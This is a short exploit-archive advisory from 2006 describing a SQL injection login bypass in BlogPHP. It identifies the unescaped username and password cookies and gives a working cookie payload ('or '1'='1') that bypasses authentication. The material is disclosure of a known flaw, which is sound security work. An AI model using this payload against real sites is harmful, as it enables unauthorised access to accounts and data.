BlogPHP config.php SQL injection login bypass

CVE Category Price Severity
N/A CWE-89 N/A High
Author Risk Exploitation Type Date
Unknown High Remote 2006-01-28
CVSS:4.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at:

Below is a copy:


Software: BlogPHP
Sowtware's Web Site:
Versions: 1(2)
Type: SQL Injection
Class: Remote
Status: Unpatched
Exploit: Available
Solution: Not Available
Discovered by: imei
Vulnerable scripts (as include):

Variable $_COOKIE[blogphp_username]and $_COOKIE[blogphp_password] never addslashed and have potential for SQL inject

send a cookie:
blogphp_password=imei' or '1'='1
No Patch available.

Discovered by: imei
contact : addmimistrator (at) gmail (dot) com [email concealed]

(why i must send it more than one time?)

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum